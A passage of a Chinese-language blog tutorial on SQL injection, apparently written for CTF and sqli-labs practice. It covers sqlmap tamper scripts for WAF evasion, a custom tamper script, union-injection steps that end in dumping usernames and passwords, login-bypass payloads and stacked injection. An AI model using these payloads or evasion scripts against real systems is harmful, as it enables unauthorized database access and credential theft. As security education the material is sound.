%T%A%B%L%E\n\n<strong>11\u3001sp_password.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1amssql\n\u4f5c\u7528\uff1a\u5c06sp_password\u8ffd\u52a0\u5230\u6709\u6548\u8f7d\u8377\u540e\uff0c\u4ee5\u4fbf\u4eceDBMS\u65e5\u5fd7\u4e2d\u81ea\u52a8\u6df7\u6dc6\u3002\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('1 AND 9227=9227-- ')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a1 AND 9227=9227-- sp_password\n\n<strong>12\u3001charencode.py<\/strong>\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2005\u3001MySQL 4, 5.0 and 5.5\u3001Oracle 10g\u3001PostgreSQL 8.3, 8.4, 9.0\n\u4f5c\u7528\uff1a\u5bf9\u6307\u5b9a\u7684payload\u5168\u90e8\u4f7f\u7528url\u7f16\u7801\uff08\u4e0d\u5904\u7406\u5df2\u8fdb\u884c\u7f16\u7801\u7684\u5b57\u7b26\uff09\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT FIELD FROM%20TABLE')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45\n\n<strong>13\u3001randomcase.py<\/strong>\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2005\u3001MySQL 4, 5.0 and 5.5\u3001Oracle 10g\u3001PostgreSQL 8.3, 8.4, 9.0\u3001SQLite 3\n\u4f5c\u7528\uff1a\u5c06\u5b57\u7b26\u66ff\u6362\u4e3a\u968f\u673a\u5927\u5c0f\u5199\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('INSERT')\n\u4f7f\u7528\u811a\u672c\u540e\uff1aInSeRt\n\n<strong>14\u3001charunicodeencode.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aASP \u3001ASP.NET\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2000 \u3001Microsoft SQL Server 2005\u3001MySQL 5.1.56 \u3001PostgreSQL 9.0.3\n\u4f5c\u7528\uff1a\u9002\u7528\u5b57\u7b26\u4e32\u7684Unicode\u7f16\u7801\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT FIELD%20FROM TABLE')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045\n\n<strong>15\u3001space2comment.py<\/strong>\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2005\u3001MySQL 4, 5.0 and 5.5\u3001Oracle 10g\u3001PostgreSQL 8.3, 8.4, 9.0\n\u4f5c\u7528\uff1a\u5c06\u7a7a\u683c\u66ff\u6362\u4e3a\/**\/\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT id FROM users')\n\u4f7f\u7528\u811a\u672c\u540e\uff1aSELECT\/**\/id\/**\/FROM\/**\/users<\/code><\/pre>\n\n\n\n<p>\u5f53\u7136\uff0c\u6709\u65f6\u5019\u6211\u4eec\u4e5f\u4f1a\u9047\u5230\u9700\u8981\u81ea\u5df1\u5199tamper\u7ed5waf\u7684\u60c5\u51b5\uff0c\u8fd9\u91cc\u7b80\u5355\u770b\u770btamper\u957f\u5565\u6837\uff0c\u6bd4\u5982\u6211\u4eec\u770b\u5230space2plus.py\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#!\/usr\/bin\/env python\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        quote, doublequote, firstspace = False, False, False\n\n        for i in xrange(len(payload)):\n            if not firstspace:\n                if payload&#91;i].isspace():\n                    firstspace = True\n                    retVal += \"+\"\n                    continue\n\n            elif payload&#91;i] == '\\'':\n                quote = not quote\n\n            elif payload&#91;i] == '\"':\n                doublequote = not doublequote\n\n            elif payload&#91;i] == \" \" and not doublequote and not quote:\n                retVal += \"+\"\n                continue\n\n            retVal += payload&#91;i]\n\n    return retVal<\/code><\/pre>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u6e90\u7801\u8fd8\u662f\u633a\u7b80\u5355\u7684\uff0c\u6211\u4eec\u53ea\u7528\u6539tamper\u51fd\u6570\u5c31\u597d\u4e86\uff0c\u6bd4\u5982\u6211\u4eec\u60f3\u5199\u4e00\u4e2a\u628a=\u66ff\u6362\u6210&#8221;like&#8221;\uff0c\u7a7a\u683c\u66ff\u6362\u6210\u6362\u884c\u7b26\u7684\u811a\u672c\uff0c\u5c31\u53ef\u4ee5\u8fd9\u6837\u5199\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#!\/usr\/bin\/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https:\/\/sqlmap.org\/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n\n\n    retVal = payload\n    retVal = retVal.replace(\"=\", \" like \")\n    retVal = retVal.replace(\" \", chr(0x0a))\n\n\n    return retVal<\/code><\/pre>\n\n\n\n<p>\u6bd4\u5982\u628a\u8fd9\u4e2a\u811a\u672c\u547d\u540d\u4e3atest.py\uff0c\u7136\u540e\u6211\u4eec\u5c31\u53ef\u4ee5\u8fd9\u4e48\u4f7f\u7528\u4e86\uff1a<\/p>\n\n\n\n<pre id=\"block-03c91bca-2907-426b-845a-995435f2f078\" class=\"wp-block-code\"><code>sqlmap -u \"http:\/\/xxx\/Less-1\/?id=1\" --tamper=\"test.py\"<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">SQL\u6ce8\u5165\u7b80\u4ecb<\/h1>\n\n\n\n<p><strong>sql\u6ce8\u5165\u4ea7\u751f\u7684\u672c\u8d28<\/strong>\uff0c\u662f\u7531\u4e8e\u5f00\u53d1\u8005\u6ca1\u6709\u5bf9\u7528\u6237\u7684\u8f93\u5165\u505a\u51fa\u4e25\u683c\u7684\u9650\u5236\uff0c\u5bfc\u81f4\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u6076\u610f\u7684\u8f93\u5165\u62fc\u63a5\u6b63\u5e38\u7684sql\u8bed\u53e5\u6700\u540e\u6267\u884c\u547d\u4ee4\u3002<\/p>\n\n\n\n<p>sql\u91cc\u6709\u56db\u5927\u6700\u5e38\u89c1\u7684\u64cd\u4f5c\uff0c\u5373<strong>\u589e\u5220\u67e5\u6539<\/strong>\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u589e\u3002\u589e\u52a0\u6570\u636e\u3002\u5176\u7b80\u5355\u7ed3\u6784\u4e3a: <code>INSERT table_name(columns_name) VALUES(new_values)<\/code>\u3002<\/li>\n\n\n\n<li>\u5220\u3002\u5220\u9664\u6570\u636e\u3002\u5176\u7b80\u5355\u7ed3\u6784\u4e3a: <code>DELETE table_name WHERE condition<\/code>\u3002<\/li>\n\n\n\n<li>\u67e5\u3002\u67e5\u627e\u6570\u636e\u3002\u5176\u7b80\u5355\u7ed3\u6784\u4e3a\uff1a<code>SELECT columns_name FROM table_name WHERE condition<\/code>\u3002<\/li>\n\n\n\n<li>\u6539\u3002\u6709\u4fee\u6539\/\u66f4\u65b0\u6570\u636e\u3002\u7b80\u5355\u7ed3\u6784\u4e3a:<code>UPDATE table_name SET column_name=new_value WHERE condition<\/code>\u3002<\/li>\n<\/ul>\n\n\n\n<p>MySQL 5.0\u4ee5\u4e0a\u7248\u672c\u5b58\u5728\u4e00\u4e2a\u5b58\u50a8\u7740\u6570\u636e\u5e93\u4fe1\u606f\u7684\u4fe1\u606f\u6570\u636e\u5e93&#8211;<strong>INFORMATION_SCHEMA<\/strong> \uff0c\u5176\u4e2d\u4fdd\u5b58\u7740\u5173\u4e8eMySQL\u670d\u52a1\u5668\u6240\u7ef4\u62a4\u7684\u6240\u6709\u5176\u4ed6\u6570\u636e\u5e93\u7684\u4fe1\u606f\uff0c\u5982\u6570\u636e\u5e93\u540d\uff0c\u6570\u636e\u5e93\u7684\u8868\uff0c\u8868\u680f\u7684\u6570\u636e\u7c7b\u578b\u4e0e\u8bbf\u95ee\u6743\u9650\u7b49\uff0c\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8fd9\u4e2a\u6570\u636e\u5e93\u83b7\u53d6\u5176\u4ed6\u6570\u636e\u5e93\u7684\u4fe1\u606f\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>information_schema<\/strong> \u7cfb\u7edf\u6570\u636e\u5e93\uff0c\u8bb0\u5f55\u5f53\u524d\u6570\u636e\u5e93\u7684\u6570\u636e\u5e93\uff0c\u8868\uff0c\u5217\uff0c\u7528\u6237\u6743\u9650\u7b49\u4fe1\u606f<\/li>\n\n\n\n<li><strong>SCHEMATA<\/strong> \u50a8\u5b58mysql\u6240\u6709\u6570\u636e\u5e93\u7684\u57fa\u672c\u4fe1\u606f\uff0c\u5305\u62ec\u6570\u636e\u5e93\u540d\uff0c\u7f16\u7801\u7c7b\u578b\u8def\u5f84\u7b49<\/li>\n\n\n\n<li><strong>TABLES<\/strong> \u50a8\u5b58mysql\u4e2d\u7684\u8868\u4fe1\u606f\uff0c\u5305\u62ec\u8fd9\u4e2a\u8868\u662f\u57fa\u672c\u8868\u8fd8\u662f\u7cfb\u7edf\u8868\uff0c\u6570\u636e\u5e93\u7684\u5f15\u64ce\u662f\u4ec0\u4e48\uff0c\u8868\u6709\u591a\u5c11\u884c\uff0c\u521b\u5efa\u65f6\u95f4\uff0c\u6700\u540e\u66f4\u65b0\u65f6\u95f4\u7b49<\/li>\n\n\n\n<li><strong>COLUMNS<\/strong> \u50a8\u5b58mysql\u4e2d\u8868\u7684\u5217\u4fe1\u606f\uff0c\u5305\u62ec\u8fd9\u4e2a\u8868\u7684\u6240\u6709\u5217\u4ee5\u53ca\u6bcf\u4e2a\u5217\u7684\u4fe1\u606f\uff0c\u8be5\u5217\u662f\u8868\u4e2d\u7684\u7b2c\u51e0\u5217\uff0c\u5217\u7684\u6570\u636e\u7c7b\u578b\uff0c\u5217\u7684\u7f16\u7801\u7c7b\u578b\uff0c\u5217\u7684\u6743\u9650\uff0c\u5217\u7684\u6ce8\u91ca\u7b49<\/li>\n<\/ul>\n\n\n\n<p>\u9ad8\u7248\u672c\u65f6\u6211\u4eec\u6709information_schema\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u5f97\u5230\u60f3\u8981\u7684\u540d\u79f0\uff0c\u800c\u4f4e\u4e8e5.0\u540e\u6211\u4eec\u7684\u6ce8\u5165\u5f80\u5f80\u53ea\u80fd\u4f9d\u9760\u731c\u6216\u8005\u7206\u7834\u5f97\u5230\u8868\u540d\u7b49\u6240\u9700\u8981\u7684\u540d\u79f0\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">1.\u5e38\u89c4\u6ce8\u5165<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">\u8054\u5408\u6ce8\u5165<\/h1>\n\n\n\n<p>\u8054\u5408\u6ce8\u5165\u5373union\u6ce8\u5165\uff0c\u5176\u4f5c\u7528\u5c31\u662f\uff0c\u5728\u539f\u6765\u67e5\u8be2\u6761\u4ef6\u7684\u57fa\u7840\u4e0a\uff0c\u901a\u8fc7\u7cfb\u7edf\u5173\u952e\u5b57<code>union<\/code>\u4ece\u800c\u62fc\u63a5\u4e0a\u6211\u4eec\u81ea\u5df1\u7684<code>select<\/code>\u8bed\u53e5\uff0c\u7136\u540e\u628a\u540e\u9762<code>select<\/code>\u5f97\u5230\u7684\u7ed3\u679c\u5c06\u62fc\u63a5\u5230\u524d\u9762<code>select<\/code>\u7684\u7ed3\u679c\u540e\u8fb9\u3002\u5982\uff1a\u524d\u4e2a<code>select<\/code>\u5f97\u52302\u6761\u6570\u636e\uff0c\u540e\u4e2a<code>select<\/code>\u4e5f\u5f97\u52302\u6761\u6570\u636e\uff0c\u90a3\u4e48\u540e\u4e2a<code>select<\/code>\u7684\u6570\u636e\u5c06\u62fc\u63a5\u5230\u7b2c\u4e00\u4e2a<code>select<\/code>\u8fd4\u56de\u7684\u5185\u5bb9\u4e2d\u3002<\/p>\n\n\n\n<p>\u8054\u5408\u6ce8\u5165\u6709\u5b83\u7684\u5229\u7528\u6761\u4ef6\uff0cUNION \u5185\u90e8\u7684&nbsp;SELECT \u8bed\u53e5\u5fc5\u987b\u62e5\u6709\u76f8\u540c\u6570\u91cf\u7684\u5217\uff0c\u5217\u4e5f\u5fc5\u987b\u62e5\u6709\u76f8\u4f3c\u7684\u6570\u636e\u7c7b\u578b\uff0c\u6bcf\u6761&nbsp;SELECT \u8bed\u53e5\u4e2d\u7684\u5217\u7684\u987a\u5e8f\u5fc5\u987b\u76f8\u540c\uff0c\u4e5f\u5c31\u662f\u8bf4\u53ea\u80fd\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select 1,2,3 from table_name1 union select 4,5,6 from table_name2;<\/code><\/pre>\n\n\n\n<p>\u8fd9\u4e5f\u662f\u4e3a\u4ec0\u4e48\u6211\u4eec\u5728\u8054\u5408\u6ce8\u5165\u4e4b\u524d\u5f80\u5f80\u9700\u8981\u5148\u5229\u7528 <code>order\/group by n<\/code> \u5224\u65ad\u5b57\u6bb5\u7684\u6570\u91cf\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u8054\u5408\u67e5\u8be2\u6ce8\u5165\u6b65\u9aa4<\/h2>\n\n\n\n<p>\u5047\u5982\u5bf9\u4e8eurl\/?id=1\uff0c\u4e14\u540e\u7aef\u4ee3\u7801\u7528\u5355\u5f15\u53f7\u5305\u88f9\u53c2\u6570\uff0c\u6211\u4eec\u7684\u6ce8\u5165\u6b65\u9aa4\u4e3a\uff08\u5176\u5b9e\u5373sqllib\u7b2c\u4e00\u5173\uff0cbuuoj\u6709\u5728\u7ebf\u73af\u5883\uff09<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">MySQL &gt;= 5.0<\/h3>\n\n\n\n<p><strong>1) \u786e\u5b9a\u5b57\u6bb5\u7684\u6570\u91cf<\/strong><\/p>\n\n\n\n<p>\u901a\u8fc7\u4ece1\u5f00\u59cb\u6539\u53d8n\u7684\u5927\u5c0f\uff0c\u5982\u679c\u7f51\u9875\u51fa\u73b0\u62a5\u9519\u5219\u8bc1\u660en\u5927\u4e8e\u771f\u5b9e\uff0c\u56e0\u4e3aorder by n\u662f\u5bf9\u7b2cn\u4e2a\u5b57\u6bb5\u8fdb\u884c\u6392\u5e8f\u7684\u610f\u601d\uff0c\u5982\u679cn\u7684\u503c\u5927\u4e8e\u771f\u5b9e\u7684\u5b57\u6bb5\u6570\u91cf\u81ea\u7136\u5c31\u4f1a\u62a5\u9519\u4e86\u3002\u81f3\u4e8e\u6700\u540e\u7684&#8211;+\u662f\u6ce8\u91ca\u7b26\u7684\u610f\u601d\uff0c\u4e3a\u4e86\u6ce8\u91ca\u6389\u539f\u6709\u7684sql\u8bed\u53e5\u6267\u884c\u6211\u4eec\u81ea\u5df1\u7684\uff0c\u4e5f\u53ef\u4ee5\u7528%23\u5373#\u4ee3\u66ff\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=1' order by n --+<\/code><\/pre>\n\n\n\n<p>\u6216\u8005\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=1' group by n --+<\/code><\/pre>\n\n\n\n<p>group\u662f\u5bf9\u6570\u636e\u8fdb\u884c\u5206\u7ec4\uff0c\u4e5f\u53ef\u4ee5\u8d77\u5230\u76f8\u540c\u7684\u6548\u679c\u3002<\/p>\n\n\n\n<p><strong>2) \u5224\u65ad\u56de\u663e\u4f4d<\/strong><\/p>\n\n\n\n<p>\u6709\u65f6\u5019\u9875\u9762\u91cc\u53ea\u6709\u4e00\u4e2a\u56de\u663e\u4f4d\uff0c\u6240\u4ee5\u6211\u4eec\u9700\u8981\u7528-1\u4fdd\u8bc1\u524d\u9762\u7684\u67e5\u8be2\u67e5\u4e0d\u51fa\u6570\u636e\u4ee5\u786e\u4fdd\u540e\u9762\u7684\u8054\u5408\u67e5\u8be2\u80fd\u6b63\u5e38\u67e5\u8be2\uff0c\u5047\u5982\u6211\u4eec\u786e\u5b9a\u4e86\u4e00\u5171\u6709\u4e09\u4e2a\u5b57\u6bb5\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,3 --+<\/code><\/pre>\n\n\n\n<p>\u901a\u8fc7\u6570\u5b57\u662f\u51e0\u5224\u65ad\u56de\u663e\u4f4d<\/p>\n\n\n\n<p><strong>3) \u83b7\u53d6\u7cfb\u7edf\u6570\u636e\u5e93\u540d<\/strong><\/p>\n\n\n\n<p>group_concat()\u7684\u4f5c\u7528\u662f\u628a\u56de\u663e\u653e\u5230\u4e00\u884c\u91cc\uff0c\u4fbf\u4e8e\u89c2\u5bdf<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+<\/code><\/pre>\n\n\n\n<p><strong>4) \u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u540d<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,database() --+<\/code><\/pre>\n\n\n\n<p><strong>5) \u83b7\u53d6\u6570\u636e\u5e93\u4e2d\u7684\u8868<\/strong><\/p>\n\n\n\n<p>\u83b7\u53d6\u5f53\u524d\u6570\u636e\u7684\u6240\u6709\u8868\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+<\/code><\/pre>\n\n\n\n<p>\u6216\u8005<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+<\/code><\/pre>\n\n\n\n<p>\u5373\u83b7\u53d6security\u6570\u636e\u5e93\u4e0b\u7684\u6240\u6709\u8868\u540d<\/p>\n\n\n\n<p><strong>6) \u83b7\u53d6\u8868\u91cc\u7684\u5217\u540d(\u5373\u5b57\u6bb5\u540d)<\/strong><\/p>\n\n\n\n<p>\u83b7\u5f97users\u8868\u4e0b\u7684\u6240\u6709\u5b57\u6bb5\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+<\/code><\/pre>\n\n\n\n<p><strong>7) \u83b7\u53d6\u6570\u636e<\/strong><\/p>\n\n\n\n<p>\u5982\u679c\u6211\u4eec\u60f3\u83b7\u5f97users\u8868\u4e0busername\u4ee5\u53capassword\u7684\u503c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,group_concat(username , password) from users --+<\/code><\/pre>\n\n\n\n<p>\u7b80\u5355\u7684\u8bf4\uff0c<strong>\u67e5\u5e93\u540d-&gt;\u67e5\u8868\u540d-&gt;\u67e5\u5b57\u6bb5\u540d-&gt;\u67e5\u6570\u636e<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">MySQL &lt; 5.0<\/h3>\n\n\n\n<p>MySQL &lt; 5.0 \u6ca1\u6709\u4fe1\u606f\u6570\u636e\u5e93<strong>information_schema<\/strong>\uff0c\u6240\u4ee5\u53ea\u80fd\u624b\u5de5\u7206\u7834\u4e86\uff0c\u4e00\u822c\u7528\u4e8e\u76f2\u6ce8\uff0c\u4e0d\u8fc7\u73b0\u5728\u5e02\u9762\u4e2d\u57fa\u672c\u4e0a\u5f88\u591a\u7684\u6570\u636e\u5e93\u90fd\u662f5.0\u4ee5\u4e0a\u7684\u7248\u672c\uff0c\u6682\u65f6\u8fd8\u6ca1\u9047\u5230\u8fc75.0\u4ee5\u4e0b\u7684\u3002<\/p>\n\n\n\n<p>\u8bf4\u5230\u8054\u5408\u6ce8\u5165\u6211\u5c31\u60f3\u5230\u8054\u5408\u6ce8\u5165\u7684\u4e00\u4e2a\u6280\u5de7\uff0c\u5c31\u662f\u63d2\u5165\u4e34\u65f6\u8868\uff0c\u987a\u4fbf\u518d\u6765\u8c08\u8c08sql\u4e07\u80fd\u5bc6\u7801<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">sql\u4e07\u80fd\u5bc6\u7801<\/h2>\n\n\n\n<h4 class=\"wp-block-heading\">union\u63d2\u5165\u4e34\u65f6\u8868<\/h4>\n\n\n\n<p>[GXYCTF2019]BabySQli1\u5c31\u662f\u8fd9\u6837\u4e00\u9053\u4f8b\u9898\u3002\u5982\u679c\u67d0\u4e2a\u7f51\u7ad9\u7684\u540e\u53f0\u6e90\u7801\u662f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from user where username = '$name'<\/code><\/pre>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u5229\u7528sqli\u7684\u8054\u5408\u6ce8\u5165\u7684\u7279\u6027\uff0c\u5728\u4f7f\u7528\u8054\u5408\u6ce8\u5165\u65f6\uff0c\u5982\u679c\u4f60\u67e5\u8be2\u7684\u6570\u636e\u4e0d\u5b58\u5728\uff0c\u90a3\u4e48\u5c31\u4f1a\u751f\u6210\u4e00\u4e2a\u5185\u5bb9\u4e3anull\u7684\u865a\u62df\u6570\u636e\uff0c\u4e5f\u5c31\u662f\u8bf4<strong>\u5728\u8054\u5408\u67e5\u8be2\u5e76\u4e0d\u5b58\u5728\u7684\u6570\u636e\u65f6\uff0c\u8054\u5408\u67e5\u8be2\u5c31\u4f1a\u6784\u9020\u4e00\u4e2a\u865a\u62df\u7684\u6570\u636e\u3002<\/strong>\u6240\u4ee5\u8fd9\u65f6\u6211\u4eec\u5c31\u53ef\u4ee5\u5728\u6ce8\u5165\u65f6\u6dfb\u52a0\u6211\u4eec\u9700\u8981\u7684\u4fe1\u606f\u6765\u5b8c\u6210\u6211\u4eec\u7684\u76ee\u7684\uff0c\u6bd4\u5982\u6211\u4eec\u4f7f\u7528union select &#8216;dingzhen&#8217;,&#8217;123456&#8217;\uff0c\u6570\u636e\u5e93\u4e2d\u5c31\u4f1a\u51fa\u73b0\u4e00\u6761\u4e34\u65f6\u6570\u636e\uff0c\u5373dingzhen\u548c123456<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-11.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"662\" height=\"324\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-11.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1392\"  sizes=\"auto, (max-width: 662px) 100vw, 662px\" \/><\/div><\/figure>\n\n\n\n<p>\u56e0\u6b64\u5728\u53ef\u4ee5\u8054\u5408\u6ce8\u5165\u7684\u60c5\u51b5\u4e0b\u53ea\u8981\u8f93\u5165payload:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>name=dingzhen' union select 'admin','123456'--+ &amp;passwd=123456<\/code><\/pre>\n\n\n\n<p>\u5373\u53ef\u6210\u529f\u5229\u7528\u521b\u5efa\u7684\u4e34\u65f6\u6570\u636e\u767b\u5f55(\u771f\u5b9e\u60c5\u51b5\u4e0b\u8fd8\u9700\u8981\u9002\u5f53\u4fee\u6539payload)<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u6c38\u771f\u8bed\u53e5<\/h4>\n\n\n\n<p>\u8fd9\u4e2a\u5e94\u8be5\u662f\u6700\u5e38\u89c1\u7684\uff0c\u5373\u4f7f\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' or 1='1\n'or'='or'<\/code><\/pre>\n\n\n\n<p>\u7b49\u7b49\uff0c\u901a\u8fc7\u4e00\u4e2a\u6c38\u771f\u5224\u65ad\u767b\u5f55<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u7528\\\u6784\u9020\u4e07\u80fd\u5bc6\u7801\u767b\u5f55<\/h4>\n\n\n\n<p>\u4e00\u822c\u6765\u8bf4\u6784\u9020\u4e07\u80fd\u7684\u5bc6\u7801\u7684\u65f6\u5019\u90fd\u9700\u8981\u5148\u7528\u5f15\u53f7\u95ed\u5408\uff0c\u5982\u679c\u5f15\u53f7\u88ab\u8fc7\u6ee4\u4e86\uff0c\u6211\u4eec\u5176\u5b9e\u8fd8\u662f\u53ef\u4ee5\u7528\\\u6784\u9020\u4e07\u80fd\u5bc6\u7801\uff0c\u5047\u5982\u540e\u53f0\u7684\u6e90\u7801\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select user from user where user='$_POST&#91;username]' and password='$_POST&#91;password]';<\/code><\/pre>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u4f20\u5165<code>username=admin\\&amp;password=or 2&gt;1#<\/code>\uff0c\u8fd9\u65f6\u540e\u53f0\u63a5\u53d7\u5230\u7684\u5c31\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from users where username='admin\\' and password=' or 2&gt;1#';<\/code><\/pre>\n\n\n\n<p>\\\u4f1a\u95ed\u5408\u6389admin\u540e\u9762\u90a3\u4e2a\u5f15\u53f7\uff0c\u76f8\u5f53\u4e8e\u63a5\u6536\u5230where username=&#8217;admin and password=&#8217; or 2&gt;1 \uff0c\u8fd9\u663e\u7136\u662f\u4e00\u4e2a\u6c38\u771f\u5224\u65ad\uff0c\u867d\u7136\u4e0d\u5b58\u5728admin and password=\u8fd9\u4e2a\u7528\u6237\uff0c\u4f46\u6211\u4eec\u7528or 2&gt;1\u8ba9\u8fd9\u4e2a\u6761\u4ef6\u6c38\u8fdc\u6210\u7acb\u4e86\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u5806\u53e0\u6ce8\u5165<\/h1>\n\n\n\n<p>\u5206\u53f7<code>;<\/code>\u4e3aMYSQL\u8bed\u53e5\u7684\u7ed3\u675f\u7b26\uff0c\u82e5\u5728\u652f\u6301\u591a\u8bed\u53e5\u6267\u884c\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u5229\u7528\u6b64\u65b9\u6cd5\u6267\u884c\u5176\u4ed6\u6076\u610f\u8bed\u53e5\u3002\u6bd4\u5982\u6709\u51fd\u6570mysqli_multi_query()\uff0c\u5b83\u652f\u6301\u6267\u884c\u4e00\u4e2a\u6216\u591a\u4e2a\u9488\u5bf9\u6570\u636e\u5e93\u7684\u67e5\u8be2\uff0c\u67e5\u8be2\u8bed\u53e5\u4f7f\u7528\u5206\u53f7\u9694\u5f00\u3002\u5982\u679c\u6b63\u5e38\u7684\u8bed\u53e5\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select 1;<\/code><\/pre>\n\n\n\n<p>\u82e5\u652f\u6301\u5806\u53e0\u6ce8\u5165\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5728\u540e\u9762\u6dfb\u52a0\u81ea\u5df1\u7684\u8bed\u53e5\u6267\u884c\u547d\u4ee4\uff0c\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select 1;;show tables%23<\/code><\/pre>\n\n\n\n<p>\u4f46\u901a\u5e38\u591a\u8bed\u53e5\u6267\u884c\u65f6\uff0c\u82e5\u524d\u6761\u8bed\u53e5\u5df2\u8fd4\u56de\u6570\u636e\uff0c\u5219\u4e4b\u540e\u7684\u8bed\u53e5\u8fd4\u56de\u7684\u6570\u636e\u901a\u5e38\u65e0\u6cd5\u8fd4\u56de\u524d\u7aef\u9875\u9762\uff0c\u53ef\u8003\u8651\u4f7f\u7528<code>RENAME<\/code>\u5173\u952e\u5b57\uff0c\u5c06\u60f3\u8981\u7684\u6570\u636e\u5217\u540d\/\u8868\u540d\u66f4\u6539\u6210\u8fd4\u56de\u6570\u636e\u7684SQL\u8bed\u53e5\u6240\u5b9a\u4e49\u7684\u8868\/\u5217\u540d \u3002\u5177\u4f53\u53c2\u8003\uff1a<a href=\"https:\/\/blog.csdn.net\/m0_62851980\/article\/details\/123942292\">BUUCTF-\u5f3a\u7f51\u676f2019\u968f\u4fbf\u6ce8 write up<\/a><\/p>\n\n\n\n<h2 